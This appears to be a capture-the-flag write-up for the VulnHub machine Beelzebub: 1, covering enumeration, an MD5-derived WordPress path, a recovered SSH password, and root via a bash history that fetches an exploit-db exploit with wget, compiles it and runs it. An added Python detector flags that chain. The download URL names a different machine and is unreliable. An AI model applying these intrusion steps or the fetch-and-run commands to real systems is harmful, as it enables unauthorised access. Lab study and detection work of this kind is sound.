- English name: BEELZEBUB: 1
- Chinese name: 别西蔔:1
- Release date: September 8, 2021
- Difficulty: Easy
- Description: You have to enumerate as much as you can, and don't forget Base64.
- Download URL: https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
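1. Boot screen: it reveals the username (krampus)
[Screenshot: boot screen]
2. Host discovery (192.168.199.146)
[Screenshot: host discovery]
3. Port scan (ports 22 and 80)
[Screenshot: port scan]
4. View the web page
[Screenshot: web page]
5. Scan directories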
dirb http://192.168.199.146/
or
dirsearch -u http://192.168.199.146/
[Screenshot: directory scan]
6. Visit the index page
[Screenshot: index page]
View the source of the index page to find a clue:
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
[Screenshot: index page source]
7. Compute the MD5 of beelzebub
└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
d18e1e22becbd915b45e0e655429d487
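[Screenshot: MD5 calculation]
8. Try visiting the link; the request gets a 301 redirect
[Screenshot: looks like a WordPress site]
9. Try enumerating the directory; this confirms it is a WordPress site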
dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/
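[Screenshot: directory enumeration]
10. Try visiting uploads
[Screenshot: uploads]
Click "talk to valak"
People who sign a pact sometimes try to outwit the devil, but in the end they fail.
[Screenshot: talk to valak]
11. Analyze the request in Burp and obtain the password M4k3Ad3a1
[Screenshot: Burp analysis]
12. Try logging in over SSH
[Screenshot: SSH login]
13. The regular user's flag is obtained
[Screenshot: user flag]
14. Dig for clues (.bash_history)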
krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .
drwxr-xr-x 3 root root 4096 Mar 16 2021 ..
-rw------- 1 krampus krampus 1407 Mar 20 2021 .bash_history
drwx------ 11 krampus krampus 4096 Mar 20 2021 .cache
drwxrwxrwx 14 krampus krampus 4096 May 26 2020 .config
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbus
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktop
drwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documents
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloads
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupg
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs
-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthority
drwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .local
drwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilla
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Music
drwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures
-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profile
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public
-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor
-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf
-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successful
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templates
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos
-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts
15. View the history
krampus@beelzebub:~$ cat .bash_history
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
chmod 0750 html/
ifconfig
cd /var/lib/mysql/
clear
ls
cd wordpress/
sudo su
su root
clear
ls
cd Desktop/
clear
ls
cat user.txt
clear
uname -a
sudo -1
sudo -i
clear
uname -a
sudo -i
find / -prem -u=s -type f 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
cat /etc/issue
sudo -l
cd
cd ../
cd ../../../../
clear
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
clear
ls
cd Trash/
ls
cat info
cd info
ls
ls -la
cd ../
clear
cd ../
ls
rm -rf Trash/
clear
su root
history -R
history -r
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
history
clear
cd
clear
ip link
su root
clear
ls
history
clear
ls
cd /tmp/
ls
su root
exit
clear
16. Following the hints in .bash_history, complete the privilege escalation and obtain root's flag
[Screenshot: reproduction]
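Seen from the defender's side, the history in step 15 is a triage artifact. The following added example (not part of the original write-up) flags the download, rename, compile, execute chain visible there; the function names are hypothetical, the sample lines are copied from the history above, and it assumes wget/curl save the file under the last path component of the URL.

```python
import re
import shlex

# Sample input: the relevant lines copied from the .bash_history in step 15.
SAMPLE_HISTORY = """\
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
"""

def _name(path):
    """Treat ./foo, /tmp/foo and foo as the same artifact name."""
    return path.rstrip("/").rsplit("/", 1)[-1]

def find_download_build_run(history):
    """Return (line_no, command, stage) for each step of a download -> compile -> execute chain."""
    tainted = set()   # names of files that derive from a network download
    findings = []
    for no, line in enumerate(history.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:            # unbalanced quote in a history line
            continue
        if not argv:
            continue
        cmd, args = _name(argv[0]), argv[1:]
        if cmd in ("wget", "curl"):
            urls = [a for a in args if re.match(r"https?://", a)]
            tainted.update(_name(u) for u in urls)   # assumes no -O / -o rename
            if urls:
                findings.append((no, line, "download"))
        elif cmd in ("mv", "cp") and len(args) >= 2 and _name(args[-2]) in tainted:
            tainted.add(_name(args[-1]))
            findings.append((no, line, "rename"))
        elif cmd in ("gcc", "cc", "clang") and any(_name(a) in tainted for a in args):
            out = args[args.index("-o") + 1] if "-o" in args[:-1] else "a.out"
            tainted.add(_name(out))
            findings.append((no, line, "compile"))
        elif "/" in argv[0] and cmd in tainted:   # e.g. ./exploit
            findings.append((no, line, "execute"))
    return findings

if __name__ == "__main__":
    for no, line, stage in find_download_build_run(SAMPLE_HISTORY):
        print(f"line {no}: {stage:8} {line}")
```

Shell history is writable by the user it belongs to, so a hit is a lead to confirm against process or audit logs rather than proof on its own.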
That completes the exercise.
Published on 2022-08-22 21:46